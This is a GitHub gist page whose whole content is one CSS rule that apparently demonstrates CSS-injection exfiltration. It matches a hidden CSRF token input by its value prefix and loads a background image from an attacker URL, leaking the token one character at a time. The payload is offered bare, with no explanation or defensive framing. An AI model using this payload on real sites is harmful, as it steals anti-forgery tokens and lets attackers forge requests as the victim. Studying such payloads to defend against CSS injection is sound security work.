Skip to content

Instantly share code, notes, and snippets.

@d0nutptr
Created July 25, 2018 07:24
Show Gist options
  • Save d0nutptr/254621af3ee175279495521503886db2 to your computer and use it in GitHub Desktop.
Save d0nutptr/254621af3ee175279495521503886db2 to your computer and use it in GitHub Desktop.
input[name=csrf][value^=csrF] ~ * {
background-image: url(https://attacker.com/exfil/csrF);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment